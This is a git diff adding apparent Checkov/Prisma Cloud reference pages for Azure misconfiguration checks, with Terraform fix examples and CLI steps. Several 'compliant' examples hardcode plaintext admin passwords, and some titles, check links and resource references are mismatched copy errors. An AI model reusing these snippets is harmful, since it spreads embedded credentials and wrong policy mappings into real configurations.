a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc new file mode 100644 index 000000000..19ed02249 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc @@ -0,0 +1,105 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) Periodic recurring scans is disabled +// Azure SQL Server ADS Vulnerability Assessment (VA) 'Periodic recurring scans' setting disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1b1990cf-fff3-40c0-bd02-7e1ca01cd3f3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml[CKV2_AZURE_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Vulnerability Assessment (VA) Periodic recurring scans for critical SQL servers and corresponding SQL databases. +VA setting 'Periodic recurring scans' schedules periodic (weekly) vulnerability scanning for the SQL server and corresponding Databases. +Periodic and regular vulnerability scanning provides risk visibility based on updated known vulnerability signatures and best practices. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment + + +[source,go] +---- +{ + " +resource "azurerm_resource_group" "okExample" { + name = "okExample-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "okExample" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_storage_account" "okExample" { + name = "accteststorageaccount" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_storage_container" "okExample" { + name = "accteststoragecontainer" + storage_account_name = azurerm_storage_account.okExample.name + container_access_type = "private" +} + + +resource "azurerm_mssql_server_security_alert_policy" "okExample" { + resource_group_name = azurerm_resource_group.okExample.name + server_name = azurerm_sql_server.okExample.name + state = "Enabled" +} + + +resource "azurerm_mssql_server_vulnerability_assessment" "okExample" { + server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id + storage_container_path = "${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/" + storage_account_access_key = azurerm_storage_account.okExample.primary_access_key + + recurring_scans { + enabled = true + email_subscription_admins = true + emails = [ + "email@example1.com", + "email@example2.com" + ] + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc new file mode 100644 index 000000000..da71b12f5 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc @@ -0,0 +1,104 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' is not configured +// Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' setting not configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0d407687-9f9f-445c-b471-1f69c1acd55b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml[CKV2_AZURE_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Configure 'Send scan reports to' with email ids of concerned data owners/stakeholders for a critical SQL servers. +Vulnerability Assessment (VA) scan reports and alerts will be sent to email ids configured at *Send scan reports to*. +This may help in reducing time required for identifying risks and taking corrective measures. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "okExample" { + name = "okExample-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "okExample" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_storage_account" "okExample" { + name = "accteststorageaccount" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_storage_container" "okExample" { + name = "accteststoragecontainer" + storage_account_name = azurerm_storage_account.okExample.name + container_access_type = "private" +} + + +resource "azurerm_mssql_server_security_alert_policy" "okExample" { + resource_group_name = azurerm_resource_group.okExample.name + server_name = azurerm_sql_server.okExample.name + state = "Enabled" +} + + +resource "azurerm_mssql_server_vulnerability_assessment" "okExample" { + server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id + storage_container_path = "${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/" + storage_account_access_key = azurerm_storage_account.okExample.primary_access_key + + recurring_scans { + enabled = true + email_subscription_admins = true + emails = [ + "email@example1.com", + "email@example2.com" + ] + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc new file mode 100644 index 000000000..bc5fcb4a7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc @@ -0,0 +1,57 @@ +== Virtual machine scale sets do not have encryption at host enabled +// Virtual Machine scale sets 'encryption at host' disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eb556c1a-e906-4172-a30f-8c342fc7e4c3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py[CKV_AZURE_97] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use encryption at host to get end-to-end encryption for your virtual machine and virtual machine scale set data. +Encryption at host enables encryption at rest for your temporary disk and OS/data disk caches. +Temporary and ephemeral OS disks are encrypted with platform-managed keys when encryption at host is enabled. +OS/data disk caches are encrypted at rest with either customer-managed or platform-managed key, depending on the encryption type selected on the disk. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_windows_virtual_machine_scale_set +* *Arguments:* encryption_at_host_enabled + + +[source,go] +---- +{ + "resource "azurerm_windows_virtual_machine_scale_set" "example" { + ... + + encryption_at_host_enabled = true + ... + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc new file mode 100644 index 000000000..eef2ce4ae --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc @@ -0,0 +1,242 @@ +== Virtual Machines are not backed up using Azure Backup +// Virtual Machines not backed up using Azure Backup service + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db33dfab-90da-4e41-a13b-30c52ba1c187 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml[CKV2_AZURE_12] + +|Severity +|LOW + +|Subtype +|Build +// ,Run +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that Azure Backup service is enabled and configured to create server backups for your Microsoft Azure virtual machines (VMs), in order to follow data security best practices and compliance requirements. +Azure Backup service is a cost-effective, one-click backup solution, that simplifies virtual machine data recovery in your Azure cloud account. +Once Azure Backup service is configured, your virtual machines are backed up according to a precise schedule defined within the appropriate backup policy, then recovery points are created from those backups and stored in the Azure Recovery Services vaults. +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Sign in to Azure Management Console. + +. Navigate to All resources blade at https://portal.azure.com/#blade/HubsExtension/BrowseAll to access all your Microsoft Azure resources. + +. Choose the Azure subscription that you want to access from the Subscription filter box. + +. From the Type filter box, select Virtual machine to list only the Azure virtual machines available in the selected subscription. + +. Click on the name of the virtual machine (VM) that you want to reconfigure. + +. On the navigation panel, under Operations, select Backup to access the Azure Backup service configuration for the selected virtual machine. + +. On the Backup page, perform the following: a. ++ +From the Recovery Service vault choose whether to create a new vault or select an existing one. ++ +An Azure Recovery Service vault is a storage entity that holds the virtual machine backups. ++ +b.From Choose backup policy dropdown list select an existing backup policy or click Create (or edit) a new policy to create/edit a new backup policy. ++ +A backup policy specifies frequency and time at which specified resources will be backed up and how long the backup copies are retained. ++ +c. ++ +Once the backup policy is properly configured, click Enable Backup to enable server backups for the selected Microsoft Azure virtual machine. ++ +You can now start a backup job by using Backup now button or wait for the selected policy to run the job at the scheduled time. ++ +The first backup job creates a full recovery point. ++ +Each backup job after the initial server backup creates incremental recovery points. + +. Repeat steps no. ++ +5 -- 7 to enable server backups for other Azure virtual machines available in the selected subscription. + +. Repeat steps no. ++ +4 -- 8 for each subscription created in your Microsoft Azure cloud account. + + +* In Azure CLI* + + + +. Run backup vault create command (Windows/macOS/Linux) to create a new Azure Recovery Service vault that will hold all the server backups created for the specified Azure virtual machine (VM): ++ + +[source,text] +---- +{ + "az backup vault create + --resource-group cloud-shell-storage-westeurope + --name cc-new-backup-vault + --location westeurope", +} +---- + + +. The command output should return the configuration metadata for the new vault: ++ + +[source,text] +---- +{ + "{ + "eTag": null, + "id": "/subscriptions/abcdabcd-1234-abcd-1234-abcdabcdabcd/resourceGroups/cloud-shell-storage-westeurope/providers/Microsoft.RecoveryServices/vaults/cc-new-backup-vault", + "location": "westeurope", + "name": "cc-new-backup-vault", + "properties": { + "provisioningState": "Succeeded", + "upgradeDetails": null + }, + + "resourceGroup": "cloud-shell-storage-westeurope", + "sku": { + "name": "Standard" + }, + + "tags": null, + "type": "Microsoft.RecoveryServices/vaults" +}", + + +} +---- + +. Run backup protection enable-for-vm command (Windows/macOS/Linux) to enable server backups for the selected Microsoft Azure virtual machine. ++ +Use the default backup policy provided by Azure Backup service or run az backup policy set command (Windows/macOS/Linux) to update the default policy if you need to change the backup schedule/frequency and/or the retention period configured. ++ +The default backup protection policy (i.e. ++ +"DefaultPolicy") runs a backup job each day and retains recovery points for 30 days: ++ + +[source,text] +---- +{ + "az backup protection enable-for-vm + --resource-group cloud-shell-storage-westeurope + --vm cc-production-vm + --vault-name cc-new-backup-vault + --policy-name DefaultPolicy", + +} +---- + +. The command output should return the backup protection enable-for-vm command request metadata: ++ + +[source,text] +---- +{ + "{ + "eTag": null, + "id": "/subscriptions/abcdabcd-1234-abcd-1234-abcdabcdabcd/resourcegroups/cc-vm-resource-group/providers/microsoft.recoveryservices/vaults/cc-new-backup-vault/backupJobs/abcdabcd-1234-abcd-1234-abcdabcdabcd", + "location": null, + "name": "abcdabcd-1234-abcd-1234-abcdabcdabcd", + "properties": { + "actionsInfo": null, + "activityId": "abcdabcd-1234-abcd-1234-abcdabcdabcd", + "backupManagementType": "AzureIaasVM", + "containerName": ";iaasvmcontainerv2;cc-vm-resource-group;cc-production-vm", + "duration": "0:00:30.975155", + "endTime": "2019-10-29T12:15:00.240606+00:00", + "entityFriendlyName": "cc-production-vm", + "errorDetails": null, + "extendedInfo": { + "dynamicErrorMessage": null, + "estimatedRemainingDuration": null, + "internalPropertyBag": null, + "progressPercentage": null, + "propertyBag": { + "Policy Name": "DefaultPolicy", + "VM Name": "cc-production-vm" + }, + + "tasksList": [] + }, + + "jobType": "AzureIaaSVMJob", + "operation": "ConfigureBackup", + "startTime": "2019-10-29T12:15:00.265451+00:00", + "status": "Completed", + "virtualMachineVersion": "Compute" + }, + + "resourceGroup": "cloud-shell-storage-westeurope", + "tags": null, + "type": "Microsoft.RecoveryServices/vaults/backupJobs" +}", + + +} +---- + +. Repeat steps no. ++ +1 -- 4 to enable server backups for other Azure virtual machines provisioned in the current subscription. + +. Repeat steps no. ++ +1 -- 5 for each subscription available within your Microsoft Azure cloud account. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_backup_protected_vm, azurerm_virtual_machine + + +[source,go] +---- +{ + "resource "azurerm_virtual_machine" "example_ok" { + name = "${var.prefix}-vm" + location = azurerm_resource_group.main.location + resource_group_name = azurerm_resource_group.main.name + network_interface_ids = [azurerm_network_interface.main.id] + vm_size = "Standard_DS1_v2" +} + + +resource "azurerm_backup_protected_vm" "vm_protected_backup" { + resource_group_name = azurerm_resource_group.example_ok.name + recovery_vault_name = azurerm_recovery_services_vault.example_ok.name + source_vm_id = azurerm_virtual_machine.example_ok.id + backup_policy_id = azurerm_backup_policy_vm.example_ok.id +} + + +", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-use-managed-disks.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-use-managed-disks.adoc new file mode 100644 index 000000000..5196afcef --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-use-managed-disks.adoc @@ -0,0 +1,81 @@ +== Azure Linux and Windows Virtual Machines does not utilize Managed Disks +// Azure Linux and Windows Virtual Machines do not use Managed Disks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2ada7204-3fa1-4d82-b6af-85322c58bbed + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py[CKV_AZURE_92] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Using Azure Managed disk over traditional BLOB based VHD's has more advantage features like Managed disks are by default encrypted, reduces cost over storage accounts and more resilient as Microsoft will manage the disk storage and move around if underlying hardware goes faulty. +It is recommended to move BLOB based VHD's to Managed Disks. +//// +=== Fix - Runtime + + +* In Azure CLI* + + + +. Log in to the Azure Portal + +. Select 'Virtual Machines' from the left pane + +. Select the reported virtual machine + +. Select 'Disks' under 'Settings' + +. Click on 'Migrate to managed disks' + +. Select 'Migrate'", "remediable": false, +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_windows_virtual_machine +* *Arguments:* storage_os_disk + + +[source,go] +---- +{ + "resource "azurerm_windows_virtual_machine" "example" { + ... + + storage_os_disk { + name = "myosdisk1" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + ... +} ", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc new file mode 100644 index 000000000..c6c5ebaa3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc @@ -0,0 +1,107 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) is disabled +// Azure SQL Server ADS Vulnerability Assessment (VA) disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8806a20a-d0dd-43f5-8e17-a1bd772bdfed + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml[CKV2_AZURE_2] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Vulnerability Assessment (VA) service scans for critical SQL servers and corresponding SQL databases. +Enabling Azure Defender for SQL server does not enables Vulnerability Assessment capability for individual SQL databases unless storage account is set to store the scanning data and reports. +The Vulnerability Assessment service scans databases for known security vulnerabilities and highlight deviations from best practices, such as misconfigurations, excessive permissions, and unprotected sensitive data. +Results of the scan include actionable steps to resolve each issue and provide customized remediation scripts where applicable. +Additionally an assessment report can be customized by setting an acceptable baseline for permission configurations, feature configurations, and database settings. +We recommend you ensure Vulnerability Assessment is enabled on a SQL server by setting a Storage Account. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "okExample" { + name = "okExample-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "okExample" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_storage_account" "okExample" { + name = "accteststorageaccount" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_storage_container" "okExample" { + name = "accteststoragecontainer" + storage_account_name = azurerm_storage_account.okExample.name + container_access_type = "private" +} + + +resource "azurerm_mssql_server_security_alert_policy" "okExample" { + resource_group_name = azurerm_resource_group.okExample.name + server_name = azurerm_sql_server.okExample.name + state = "Enabled" +} + + +resource "azurerm_mssql_server_vulnerability_assessment" "okExample" { + server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id + storage_container_path = "${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/" + storage_account_access_key = azurerm_storage_account.okExample.primary_access_key + + recurring_scans { + enabled = true + email_subscription_admins = true + emails = [ + "email@example1.com", + "email@example2.com" + ] + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable.adoc new file mode 100644 index 000000000..92bc0be56 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-the-key-vault-is-recoverable.adoc @@ -0,0 +1,94 @@ +== Azure Key Vault is not recoverable +// Azure Key Vault not recoverable + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6c9c2a98-811f-4a04-8202-51285308bad9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py[CKV_AZURE_42] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The key vault contains object keys, secrets and certificates. +Accidental unavailability of a key vault can cause immediate data loss or loss of security functions supported by the key vault objects, such as authentication, validation, verification, and non-repudiation. +Deleting or purging a key vault leads to immediate data loss as keys encrypting data, including storage accounts, SQL databases, and/or dependent services provided by key vault objects, such as keys, secrets, and certificates. +We recommended you make the key vault recoverable by enabling the *Do Not Purge* and *Soft Delete* functions. +This will prevent accidental deletion by a user running the delete/purge command on the key vault, or an attacker/malicious user does to deliberately to cause disruption. +//// +=== Fix - Runtime + + +* Procedure* + + +There are two key vault properties that play roles in the permanent unavailability of a key vault. + +. * EnablePurgeProtection*: * enableSoftDelete* only ensures that the key vault is not deleted permanently and is recoverable for 90 days from the date of deletion. ++ +There are scenarios where the key vault and/or its objects are accidentally purged will not be recoverable. ++ +Setting * enablePurgeProtection* to "true" ensures the key vault and its objects cannot be purged. ++ +Enabling both the parameters on key vaults ensures that key vaults and their objects cannot be deleted/purged permanently. + +. * SetSoftDeleteRetentionDays (Optional)*: Set the number of days that items should be retained for once soft-deleted. ++ +This value can be between 7 and 90 (the default) days. + + +* Azure Portal The Azure Portal does not currently have provision to update the respective configurations.* + + + + +* CLI Command* + + +Use the following command: +---- +az resource update +--id /subscriptions/xxxxxx-xxxx-xxxx-xxxxxxxxxxxxxxxx/resourceGroups/ +& lt;resourceGroupName>/providers/Microsoft.KeyVault/vaults/& lt;keyVaultName> +--set properties.enablePurgeProtection=true properties.enableSoftDelete=true +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_key_vault +* *Arguments:* soft_delete_enabled + purge_protection_enabled + + +[source,go] +---- +resource "azurerm_key_vault" "example" { + ... ++ purge_protection_enabled = true ++ soft_delete_retention_days = 7 # Default is 90 +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-virtual-machines-are-utilizing-managed-disks.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-virtual-machines-are-utilizing-managed-disks.adoc new file mode 100644 index 000000000..014ea9dcf --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-virtual-machines-are-utilizing-managed-disks.adoc @@ -0,0 +1,98 @@ +== Azure Virtual Machines does not utilise Managed Disks +// Azure Virtual Machines does not use Managed Disks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7e903d3-c051-48ec-acae-c4ce21362155 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml[CKV2_AZURE_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Migrate BLOB based VHD's to Managed Disks on Virtual Machines to exploit the default features of this configuration. +The features include + +. Default Disk Encryption + +. Resilience as Microsoft will managed the disk storage and move around if underlying hardware goes faulty + +. Reduction of costs over storage accounts ++ +Managed disks are by default encrypted on the underlying hardware so no additional encryption is required for basic protection, it is available if additional encryption is required. ++ +Managed disks are by design more resilient that storage accounts. ++ +For ARM deployed Virtual Machines, Azure Adviser will at some point recommend moving VHD's to managed disks both from a security and cost management perspective. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_virtual_machine + + +[source,go] +---- +{ + "resource "azurerm_virtual_machine" "virtual_machine_good" { + name = "my-vm" + location = "location" + resource_group_name = "group_name" + network_interface_ids = ["1234567"] + vm_size = "Standard_DS1_v2" + + storage_image_reference { + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + version = "latest" + } + + storage_os_disk { + name = "myosdisk1" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + os_profile { + computer_name = "hostname" + admin_username = "testadmin" + admin_password = "Password1234!" + } + + os_profile_linux_config { + disable_password_authentication = false + } + + tags = { + environment = "staging" + } + +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/set-an-expiration-date-on-all-keys.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/set-an-expiration-date-on-all-keys.adoc new file mode 100644 index 000000000..a1697f429 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/set-an-expiration-date-on-all-keys.adoc @@ -0,0 +1,118 @@ +== Azure Virtual Machines does not utilise Managed Disks +// Azure Key Vault Keys do not have expiration date + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 13ce71fb-8b1a-46bc-8302-ec3cc67a49b5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyExpirationDate.py[CKV_AZURE_40] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Azure Key Vault Keys does not have expiration date* + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 13ce71fb-8b1a-46bc-8302-ec3cc67a49b5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyExpirationDate.py [CKV_AZURE_40] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// + +=== Description + + +The Azure Key Vault enables users to store and use cryptographic keys within the Microsoft Azure environment. +The exp (expiration time) attribute identifies the expiration time on or after which the key *must not* be used for a cryptographic operation. +Keys are not set to expire by default. +We recommend you rotate keys in the key vault and set an explicit expiration time for all keys in the Azure Key Vault. +This ensures that the keys cannot be used beyond their assigned lifetimes. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Key vaults*. + +. For each Key vault: a) Click * Keys*. ++ +b) Navigate to the * Settings* section. ++ +c) Set * Enabled?* to * Yes*. ++ +d) Set an appropriate * EXPIRATION DATE* on all keys. + + +* CLI Command* + + +To update the * EXPIRATION DATE **for the key, use the following command: +---- +az keyvault key set-attributes +--name & lt;keyName> +--vault-name & lt;vaultName> +--expires Y-m-d'T'H:M:S'Z' +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_key_vault_key +* *Arguments:* expiration_date + + +[source,go] +---- +{ + "resource "azurerm_key_vault_key" "generated" { + ... ++ expiration_date = "2020-12-30T20:00:00Z" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/azure-iam-policies.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/azure-iam-policies.adoc new file mode 100644 index 000000000..a105f7853 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/azure-iam-policies.adoc @@ -0,0 +1,49 @@ +== Azure IAM Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-iam-1.adoc[App Service is not registered with an Azure Active Directory account] +| https://github.com/bridgecrewio/checkov/blob/40f5920217f6200cc36bc4dba8c08f5af4ae6d26/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_16] +|MEDIUM + + +|xref:do-not-create-custom-subscription-owner-roles.adoc[Azure subscriptions with custom roles does not have minimum permissions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py[CKV_AZURE_39] +|HIGH + + +|xref:ensure-azure-acr-admin-account-is-disabled.adoc[Azure CosmosDB does not have Local Authentication disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py[CKV_AZURE_140] +|LOW + + +|xref:ensure-azure-acr-disables-anonymous-image-pulling.adoc[Azure ACR enables anonymous image pulling] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py[CKV_AZURE_138] +|LOW + + +|xref:ensure-azure-cosmosdb-has-local-authentication-disabled.adoc[Azure CosmosDB does not have Local Authentication disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py[CKV_AZURE_140] +|LOW + + +|xref:ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc[Azure Kubernetes Service (AKS) local admin account is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py[CKV_AZURE_141] +|LOW + + +|xref:ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc[Azure Machine Learning Compute Cluster Local Authentication is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLCCLADisabled.py[CKV_AZURE_142] +|LOW + + +|xref:ensure-azure-windows-vm-enables-encryption.adoc[Azure Windows VM does not enable encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py[CKV_AZURE_151] +|LOW + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/bc-azr-iam-1.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/bc-azr-iam-1.adoc new file mode 100644 index 000000000..2d95e5903 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/bc-azr-iam-1.adoc @@ -0,0 +1,91 @@ +== App Service is not registered with an Azure Active Directory account +// App Service not registered with an Azure Active Directory account + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8d57d7e0-d820-457b-a355-b9874e475191 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/40f5920217f6200cc36bc4dba8c08f5af4ae6d26/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py[CKV_AZURE_16] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Managed service identity in *App Service* increases security by eliminating secrets from the app, for example, credentials in the connection strings. +*App Service* provides a highly-scalable, self-patching web hosting service in Azure. +It also provides a managed identity for apps, which is a turn-key solution for securing access to an Azure SQL Database and other Azure services. +We recommend you register the *App Service* with your Azure Active 